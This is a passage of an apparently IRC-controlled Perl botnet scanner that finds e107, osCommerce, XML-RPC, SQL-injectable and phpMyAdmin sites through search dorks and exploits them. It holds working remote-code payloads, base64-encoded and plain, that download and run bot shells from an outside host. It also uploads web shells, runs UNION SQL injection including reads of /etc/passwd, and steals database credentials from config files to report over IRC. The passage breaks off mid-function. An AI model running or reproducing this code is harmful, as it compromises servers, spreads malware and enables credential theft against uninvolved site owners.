1724. &get_content("http://".$site."e107_plugins/asx.php");
1725. &get_content("http://".$site."e107_plugins/logs.php");
1726. &get_content("http://".$site."e107_images/botnet.php");
1727. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_plugins/4logs.php 11,1(4@3".$sys."11,1) (4@7safemode-on11,1)");sleep(2);
1728. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_plugins/4system.php 11,1(4@3".$sys."11,1) (4@7safemode-on11,1)");sleep(2);
1729. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1730. }
1731. if ($res =~ /nxs_dima/) {
1732. my $shell = "http://".$site."e107_images/4system.php";
1733. for my $t (@{$shell}) {
1734. push @{ $found }, $t;
1735. }
1736. &get_content("http://".$site."e107_images/bb.php");
1737. &get_content("http://".$site."e107_images/asx.php");
1738. &get_content("http://".$site."e107_images/logs.php");
1739. &get_content("http://".$site."e107_images/botnet.php");
1740. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_images/4logs.php 11,1(4@3".$sys."11,1)(4@7safemode- on11,1)");sleep(2);
1741. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_images/4system.php 11,1 (4@3".$sys."11,1)(4@7safemode-on11,1)");sleep(2);
1742. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1743. }
1744. else {
1745. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9Vuln11,1)10 ".$test." 11,1(4@3".$sys."11,1)(4@7safemode-on11,1)");sleep(2);
1746. }
1747. } exit; } sleep(2);
1748. }
1749. }
1750. }
1751. }
1752.  
1753. sub e107_rce_query() {
1754. my $url = $_[0];
1755. my $code = $_[1];
1756. my $req = HTTP::Request->new(POST => $url);
1757. $req->content_type('application/x-www-form-urlencoded');
1758. $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
1759. my $ua = LWP::UserAgent->new(agent => $uagent);
1760. $ua->timeout(7);
1761. my $res = $ua->request($req);
1762. return $res->content;
1763. }
1764.  
1765. sub e107_spread_query() {
1766. my $url = $_[0];
1767. my $code = "ZWNobyAidjBwQ3Izdzxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gbm9iMGR5Q3IzdztjZCAvdG1wO3JtIC1yZiBkb3IuKiAqLmpwZy4qO2ZldGNoIGh0dHA6Ly9ueHMubmFiLn N1L2NvcmUuanBnO3BocCBjb3JlLmpwZztybSAtcmYgY29yZS5qcGc7d2dldCBodHRwOi8vbnhzLm5hYi5zdS9jb3JlLmpwZztwaHAgY29yZS5qcGc7cm0gLXJmIGNvcmUuanBnO2N1cmwgLU8gaHR0cDovL254cy5uYWIuc 3UvY29yZS5qcGc7cGhwIGNvcmUuanBnO3JtIC1yZiBjb3JlLmpwZztsd3AtZG93bmxvYWQgaHR0cDovL254cy5uYWIuc3UvY29yZS5qcGc7cGhwIGNvcmUuanBnO2NkIC92YXIvdG1wO3JtIC1yZiBkb3IuKiAqLmpwZy4q O2ZldGNoIGh0dHA6Ly9ueHMubmFiLnN1L2NvcmUuanBnO3BocCBjb3JlLmpwZztybSAtcmYgY29yZS5qcGc7d2dldCBodHRwOi8vbnhzLm5hYi5zdS9jb3JlLmpwZztwaHAgY29yZS5qcGc7cm0gLXJmIGNvcmUuanBnO2N 1cmwgLU8gaHR0cDovL254cy5uYWIuc3UvY29yZS5qcGc7cGhwIGNvcmUuanBnO3JtIC1yZiBjb3JlLmpwZztsd3AtZG93bmxvYWQgaHR0cDovL254cy5uYWIuc3UvY29yZS5qcGc7cGhwIGNvcmUuanBnOyI7CiRlc2VndW ljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOwpmdW5jdGlvbiBleCgkY2ZlKXsKJHJlcyA9ICcnOwppZiAoIWVtcHR5KCRjZmUpKXsKaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpewpAZXhlYygkY2ZlLCRyZXMpO wokcmVzID0gam9pbigiXG4iLCRyZXMpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7CiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0n KSl7CkBvYl9zdGFydCgpOwpAc3lzdGVtKCRjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2JfZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7CkBvYl9zdGFydCg pOwpAcGFzc3RocnUoJGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl9lbmRfY2xlYW4oKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwb3BlbicpKXsKJGYgPSBAcG9wZW4oJGNmZSwiciIpOwp3aG lsZSghQGZlb2YoJGNmZSkpIHsgJHJlcyAuPSBAZnJlYWQoJGNmZSwxMDI0KTsgfQpAcGNsb3NlKCRmKTsKfX0KcmV0dXJuICRyZXM7Cn0==";
1768. my $req = HTTP::Request->new(POST => $url);
1769. $req->content_type('application/x-www-form-urlencoded');
1770. $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
1771. my $ua = LWP::UserAgent->new(agent => $uagent);
1772. $ua->timeout(7);
1773. my $res = $ua->request($req);
1774. }
1775.  
1776. sub xml() {
1777. my $chan = $_[0];
1778. my $bug = $_[1];
1779. my $dork = $_[2];
1780. my $engine = $_[3];
1781. my $count = 0;
1782. my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
1783. my $num = scalar(@list);
1784. if ($num > 0) {
1785. foreach my $site (@list) {
1786. $count++;
1787. if ($count == $num-1) { &msg("$chan","$xmllogo(4@12$engine11,1)10 Scan finish"); }
1788. my $test = "http://".$site.$bug;
1789. my $vuln = "http://".$site."3".$bug;
1790. my $html = &get_content($test);
1791. if ($html =~ /faultCode/ ) {
1792. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1793. my $resp = &xml_cek_query($test);
1794. if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
1795. &xml_spread_query($test);sleep(2);
1796. my $sys = $1;
1797. my $check = &get_content("http://".$site."images.php");
1798. &get_content("http://".$site."bb.php");
1799. &get_content("http://".$site."asx.php");
1800. if ($check =~ /nxs/) {
1801. my $shell = "http://".$site."images.php";
1802. for my $t (@{$shell}) {
1803. push @{ $found }, $t;
1804. }
1805. &msg("$chan","$xmllogo(4@12$engine11,1)11,1(3@9SheLL11,1)13 http://".$site."7images.php 3".$sys);&get_content("http://". $site."bb.php"); sleep(2);}
1806. else {
1807. &msg("$chan","$xmllogo(4@12$engine11,1)11,1(4@9SysTem11,1)7 ".$vuln." 3".$sys); sleep(2);}
1808. }
1809. sleep(2); } exit; } }
1810. }
1811. }
1812. }
1813.  
1814. sub xml_cek_query() {
1815. my $url = $_[0];
1816. my $code = "system('uname -a');";
1817. my $ua = LWP::UserAgent->new(agent => 'perl post');
1818. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1819. $exploit .= "<methodName>test.method</methodName>";
1820. $exploit .= "<params><param><value><name>',''));";
1821. $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
1822. $ua->timeout(7);
1823. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
1824. return $res->content;
1825. }
1826.  
1827. sub xml_spread_query() {
1828. my $xmltargt = $_[0];
1829. my $xmlsprd = "system('wget ".$injector." -O images.php;fetch ".$injector.";mv nxs.jpg images.php;wget ".$botshell." -O bb.php;fetch ".$botshell.";mv bb.jpg bb.php;wget ".$botshell2." -O asx.php;fetch ".$botshell2.";mv asx.jpg asx.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bb.jpg;rm -rf bb.jpg;wget ".$botshell.";php bb.jpg;rm -rf bb.jpg;curl -O ".$botshell.";php bb.jpg;rm -rf bb.jpg;lwp-download ".$botshell.";php bb.jpg;fetch ". $botshell2.";php asx.jpg;rm -rf asx.jpg;wget ".$botshell2.";php asx.jpg;rm -rf asx.jpg;curl -O ".$botshell2.";php asx.jpg;rm -rf asx.jpg;lwp-download ". $botshell2.";php asx.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bb.jpg;rm -rf bb.jpg;wget ".$botshell.";php bb.jpg;rm -rf bb.jpg;curl -O ". $botshell.";php bb.jpg;rm -rf bb.jpg;lwp-download ".$botshell.";php bb.jpg;fetch ".$botshell2.";php asx.jpg;rm -rf asx.jpg;wget ".$botshell2.";php asx.jpg;rm -rf asx.jpg;curl -O ".$botshell2.";php asx.jpg;rm -rf asx.jpg;lwp-download ".$botshell2.";php asx.jpg;');";
1830. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
1831. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1832. $exploit .= "<methodName>test.method</methodName>";
1833. $exploit .= "<params><param><value><name>',''));";
1834. $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
1835. $userAgent->timeout(7);
1836. $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
1837. }
1838.  
1839. sub sql() {
1840. my $chan = $_[0];
1841. my $bug = $_[1];
1842. my $dork = $_[2];
1843. my $engine = $_[3];
1844. my $count = 0;
1845. my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
1846. my $num = scalar(@list);
1847. if ($num > 0) {
1848. foreach my $site (@list) {
1849. $count++;
1850. if ($count == $num-1) { &msg("$chan","$sqllogo(4@12$engine11,1)10 Scan finish"); }
1851. my $test = "http://".$site.$bug."'";
1852. my $vuln = "http://".$site."4".$bug;
1853. my $sqlsite = "http://".$site.$bug;
1854. my $html = &get_content($test);
1855. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1856. if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
1857. &sqlbrute($sqlsite,$chan,$engine);}
1858. elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
1859. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9MsSQL11,1)3 ".$vuln);}
1860. elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
1861. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9MsAccess11,1)3 ".$vuln);}
1862. elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
1863. &sqlbrute($sqlsite,$chan,$engine);}
1864. } exit; sleep(2); }
1865. }
1866. }
1867. }
1868.  
1869. sub sqlbrute() {
1870. my $situs=$_[0];
1871. my $chan =$_[1];
1872. my $engine=$_[2];
1873. my $columns=20;
1874. my $cfin.="--";
1875. my $cmn.= "+";
1876. for ($column = 0 ; $column < $columns ; $column ++)
1877. {
1878. $union.=','.$column;
1879. $inyection.=','."0x6c6f67696e70776e7a";
1880. if ($column == 0)
1881. {
1882. $inyection = '';
1883. $union = '';
1884. }
1885. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
1886. $response=get($sql);
1887. if($response =~ /loginpwnz/)
1888. {
1889. $column ++;
1890. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
1891. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)3 $sql ");
1892. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
1893. $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
1894. if($response =~ /loginpwnz/)
1895. {
1896. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
1897. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)(4@3INFO_SCHEMA11,1)3 $sql ");
1898. }
1899. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
1900. $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
1901. if($response =~ /loginpwnz/)
1902. {
1903. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
1904. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)(4@3USER11,1)3 $sql ");
1905. }
1906. else
1907. {
1908. }
1909. while ($loadcont < $column-1)
1910. {
1911. $loadfile.=','.'load_file(0x2f6574632f706173737764)';
1912. $loadcont++;
1913. }
1914. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
1915. $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
1916. if($response =~ /root:x:/)
1917. {
1918. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)(4@3Load File11,1)3 $sql ");
1919. }
1920. else
1921. {
1922. }
1923. foreach $tabla(@tabele)
1924. {
1925. chomp($tabla);
1926. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
1927. $response=get($sql)or die("[-] Impossible to get tables\n");
1928. if($response =~ /loginpwnz/)
1929. {
1930. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
1931. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)(4@3Tabel11,1)3 $sql ");
1932. &tabelka($situs,$tabla,$chan,$engine);
1933. }
1934. }
1935. }
1936. }
1937. }
1938.  
1939. sub tabelka() {
1940. my $situs =$_[0];
1941. my $tabla =$_[1];
1942. my $chan =$_[2];
1943. my $engine=$_[3];
1944. my $cfin.="--";
1945. my $cmn.= "+";
1946. chomp($tabla);
1947. foreach $columna(@kolumny)
1948. {
1949. chomp($columna);
1950. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
1951. $response=get($sql)or die("[-] Impossible to get columns\n");
1952. if ($response =~ /loginpwnz/)
1953. {
1954. &msg("$chan","$sqllogo(4@12$engine11,1)11,1(4@9SQL11,1)(4@3SQLi Vuln11,1)9 $situs 14(4@3Kolom14)3 $columna 14(4@3Tabel14)3 $tabla ");
1955. }
1956. }
1957.  
1958. }
1959.  
1960. sub osco() {
1961. my $chan = $_[0];
1962. my $bug = $_[1];
1963. my $dork = $_[2];
1964. my $engine = $_[3];
1965. my $count = 0;
1966. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
1967. my $num = scalar(@list);
1968. if ($num > 0) {
1969. foreach my $site (@list) {
1970. $count++;
1971. if ($count == $num-1) { &msg("$chan","$oscologo(4@12$engine11,1)10 Scan finish"); }
1972. my $test = "http://".$site.$bug;
1973. my $test1 = "http://".$site."admin/file_manager.php/login.php";
1974. my $test2 = "http://".$site."admin/banner_manager.php/login.php";
1975. my $html = &get_content($test);
1976. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1977. if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
1978. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9System11,1)7 ".$test);
1979. &osco_xpl($test,$chan,$site,$engine);
1980. &osco2($test1,$chan,$bug,$dork,$engine);
1981. &osco_xpl3($test2,$chan,$site,$engine);
1982. &osql($chan,$site,$engine);
1983. } else { }
1984. } exit; sleep(2); }
1985. }
1986. }
1987. }
1988.  
1989. sub osco_xpl() {
1990. my $browser = LWP::UserAgent->new;
1991. my $url = $_[0]."?cPath=&action=new_product_preview";
1992. my $chan = $_[1];
1993. my $site = $_[2];
1994. my $engine = $_[3];
1995. my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'ipays.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1996. my $resa = $browser->post( $url,['products_image' => ['./allnet.jpg' => 'botnet.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1997. my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'botnet2.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1998. my $hasil = $res->as_string;
1999. my $hasil1 = $resa->as_string;
2000. my $hasil2 = $resb->as_string;
2001. my $check = &get_content("http://".$site."images/ipays.php");&get_content("http://".$site."images/botnet2.php");&get_content("http://". $site."images/botnet.php");sleep(3);
2002. if ($check =~ /Rei Area/) {
2003. my $shell = "http://".$site."images/ipays.php";
2004. for my $t (@{$shell}) {
2005. push @{ $found }, $t;
2006. }
2007. my $safe ="";
2008. my $os ="";
2009. if ($check =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
2010. if ($check =~ m/color=#cccccc><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
2011. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2012. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php Botnet Bro !!!");sleep(2);
2013. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2014. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php");sleep(2);
2015. }
2016. }
2017.  
2018. sub osco2() {
2019. my $chan = $_[0];
2020. my $bug = $_[1];
2021. my $dork = $_[2];
2022. my $engine = $_[3];
2023. my $count = 0;
2024. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
2025. my $num = scalar(@list);
2026. if ($num > 0) {
2027. foreach my $site (@list) {
2028. $count++;
2029. if ($count == $num-1) { &msg("$chan","$oscologo(4@12$engine11,1)10 Scan finish"); }
2030. my $test = "http://".$site.$bug;
2031. my $test1 = "http://".$site."admin/banner_manager.php/login.php";
2032. my $test2 = "http://".$site."admin/categories.php/login.php";
2033. my $html = &get_content($test);
2034. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
2035. if ($html =~ /TABLE_HEADING_FILENAME/) {
2036. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9System11,1)7 ".$test);
2037. &osco_xpl2($test,$chan,$site,$engine);
2038. &osco_xpl3($test1,$chan,$site,$engine);
2039. &osco_xpl($test2,$chan,$site,$engine);
2040. &osql($chan,$site,$engine);
2041. } else { }
2042. } exit; sleep(2); }
2043. }
2044. }
2045. }
2046.  
2047. sub osco_xpl2() {
2048. my $browser = LWP::UserAgent->new;
2049. my $url = $_[0]."?action=processuploads";
2050. my $chan = $_[1];
2051. my $site = $_[2];
2052. my $engine = $_[3];
2053. my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'ipays.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2054. my $resa = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'botnet.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2055. my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'botnet2.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2056. my $hasil = $res->as_string;
2057. my $hasil1 = $resa->as_string;
2058. my $hasil2 = $resb->as_string;
2059. my $check = &get_content("http://".$site."images/ipays.php");&get_content("http://".$site."images/botnet.php");&get_content("http://". $site."images/botnet2.php");sleep(3);
2060. if ($check =~ /Rei Area/) {
2061. my $shell = "http://".$site."images/ipays.php";
2062. for my $t (@{$shell}) {
2063. push @{ $found }, $t;
2064. }
2065. my $safe ="";
2066. my $os ="";
2067. if ($check =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
2068. if ($check =~ m/color=#cccccc><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
2069. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2070. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php Botnet Bro !!!");sleep(2);
2071. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2072. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php");sleep(2);
2073. }
2074. }
2075.  
2076. sub osco3() {
2077. my $chan = $_[0];
2078. my $bug = $_[1];
2079. my $dork = $_[2];
2080. my $engine = $_[3];
2081. my $count = 0;
2082. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
2083. my $num = scalar(@list);
2084. if ($num > 0) {
2085. foreach my $site (@list) {
2086. $count++;
2087. if ($count == $num-1) { &msg("$chan","$oscologo(4@12$engine11,1)10 Scan finish"); }
2088. my $test = "http://".$site.$bug;
2089. my $test1 = "http://".$site."admin/file_manager.php/login.php";
2090. my $test2 = "http://".$site."admin/categories.php/login.php";
2091. my $html = &get_content($test);
2092. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
2093. if ($html =~ /TABLE_HEADING_BANNERS/) {
2094. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9System11,1)7 ".$test);
2095. &osco_xpl3($test,$chan,$site,$engine);
2096. &osco_xpl2($test1,$chan,$site,$engine);
2097. &osco_xpl($test2,$chan,$site,$engine);
2098. &osql($chan,$site,$engine);
2099. } else { }
2100. } exit; sleep(2); }
2101. }
2102. }
2103. }
2104.  
2105. sub osco_xpl3() {
2106. my $browser = LWP::UserAgent->new;
2107. my $url = $_[0]."?action=insert";
2108. my $chan = $_[1];
2109. my $site = $_[2];
2110. my $engine = $_[3];
2111. my $res = $browser->post( $url,['banners_image' => ['./ipays.jpg' => 'ipays.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2112. my $resa = $browser->post( $url,['banners_image' => ['./allnet.jpg' => 'botnet.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2113. my $resb = $browser->post( $url,['banners_image' => ['./byroe.jpg' => 'botnet2.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
2114. my $hasil = $res->as_string;
2115. my $hasil1 = $resa->as_string;
2116. my $hasil2 = $resb->as_string;
2117. my $check = &get_content("http://".$site."images/ipays.php");&get_content("http://".$site."images/botnet.php");&get_content("http://". $site."images/botnet2.php");sleep(3);
2118. if ($check =~ /Rei Area/) {
2119. my $shell = "http://".$site."images/ipays.php";
2120. for my $t (@{$shell}) {
2121. push @{ $found }, $t;
2122. }
2123. my $safe ="";
2124. my $os ="";
2125. if ($check =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
2126. if ($check =~ m/color=#cccccc><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
2127. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2128. &msg("$chan","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php Botnet Bro !!!");sleep(2);
2129. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 http://".$site."images/4ipays.php 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");sleep(2);
2130. &msg("$admin","$oscologo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."images/4botnet.php");sleep(2);
2131. }
2132. }
2133.  
2134. sub osql() {
2135. my $chan = $_[0];
2136. my $site = $_[1];
2137. my $engine = $_[2];
2138. my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
2139. my $re = &get_content($test);
2140. if ($re =~ /http:\/\//){
2141. &osql_xpl($test,$chan,$site);
2142. }
2143. }
2144.  
2145. sub osql_xpl() {
2146. my $url = $_[0];
2147. my $chan = $_[1];
2148. my $site = $_[2];
2149. my $request = HTTP::Request->new(GET=>$url);
2150. my $browser = LWP::UserAgent->new();
2151. $browser->timeout(10);
2152. my $response = $browser->request($request);
2153. if ($response->is_success) {
2154. my $res = $response->as_string;
2155. if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
2156. &msg("$chan","$ossqllogo(4@3VULN)9 http://".$site." 4[+]DIR path: $1");
2157. }
2158. if ($res =~ m/'DB_SERVER', '(.*)'/g) {
2159. &msg("$chan","$ossqllogo(4@3VULN)9 http://".$site." 4[+]DB Server: $1");
2160. }
2161. if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
2162. &msg("$chan","$ossqllogo(4@3VULN)9 http://".$site." 4[+]DB username: $1");
2163. }
2164. if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
2165. &msg("$chan","$ossqllogo(4@3VULN)9 http://".$site." 4[+]DB password: $1");
2166. }
2167. if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
2168. &msg("$chan","$ossqllogo(4@3VULN)9 http://".$site." 4[+]DB database: $1");
2169. }
2170. }
2171. }
2172.  
2173. sub oscoQ() {
2174. my $chan = $_[0];
2175. my $bug = $_[1];
2176. my $dork = $_[2];
2177. my $engine = $_[3];
2178. my $count = 0;
2179. my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);
2180. my $num = scalar(@list);
2181. if ($num > 0) {
2182. foreach my $site (@list) {
2183. $count++;
2184. if ($count == $num-1) { &msg("$chan","$ossqllogo(4@3$engine11,1,1)10 Scan finish"); }
2185. my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
2186. my $re = &get_content($test);
2187. if ($re =~ /http:\/\//){
2188. &osql_xpl($test,$chan,$site);
2189. }
2190. }
2191. }
2192. }
2193.  
2194. sub esql() {
2195. my $chan = $_[0];
2196. my $site = $_[1];
2197. my $engine = $_[2];
2198. my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
2199. my $re = &get_content($test);
2200. if ($re =~ /http:\/\//){
2201. &esql_xpl($test,$chan,$site);
2202. }
2203. }
2204.  
2205. sub esql_xpl() {
2206. my $url = $_[0];
2207. my $chan = $_[1];
2208. my $site = $_[2];
2209. my $request = HTTP::Request->new(GET=>$url);
2210. my $browser = LWP::UserAgent->new();
2211. $browser->timeout(10);
2212. my $response = $browser->request($request);
2213. if ($response->is_success) {
2214. my $res = $response->as_string;
2215. if ($res =~ m/mySQLserver = '(.*)'/g) {
2216. &msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 4[+]DB Server: 3 $1");
2217. }
2218. if ($res =~ m/mySQLuser = '(.*)'/g) {
2219. &msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 4[+]DB username: 3 $1");
2220. }
2221. if ($res =~ m/mySQLpassword = '(.*)'/g) {
2222. &msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 4[+]DB password: 3 $1");
2223. }
2224. if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {
2225. &msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 4[+]DB database: 3 $1");
2226. }
2227. }
2228. }
2229.  
2230. sub se107Q() {
2231. my $chan = $_[0];
2232. my $bug = $_[1];
2233. my $dork = $_[2];
2234. my $engine = $_[3];
2235. my $count = 0;
2236. my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);
2237. my $num = scalar(@list);
2238. if ($num > 0) {
2239. foreach my $site (@list) {
2240. $count++;
2241. if ($count == $num-1) { &msg("$chan","$e107logosql(4@12$engine11,1)10 Scan finish"); }
2242. my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
2243. my $re = &get_content($test);
2244. if ($re =~ /http:\/\//){
2245. &msg("$chan","$e107logosql(4@12$engine11,1)11,1(4@9System11,1)7 ".$test);
2246. &esql_xpl($test,$chan,$site);
2247. }
2248. }
2249. }
2250. }
2251.  
2252. sub adm() {
2253. my $chan = $_[0];
2254. my $bug = $_[1];
2255. my $dork = $_[2];
2256. my $engine = $_[3];
2257. my $count = 0;
2258. my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
2259. my $num = scalar(@list);
2260. if ($num > 0) {
2261. foreach my $site (@list) {
2262. $count++;
2263. if ($count == $num-1) { &msg("$chan","$admlogo(4@12$engine11,1)10 Scan finish"); }
2264. my $test = "http://".$site."phpMyAdmin/config/config.inc.php?c=id";
2265. my $vuln = "http://".$site."phpMyAdmin/config/config.inc.php?c=";
2266. my $re = &get_content($test);
2267. if ($re =~ /$adm_output/){
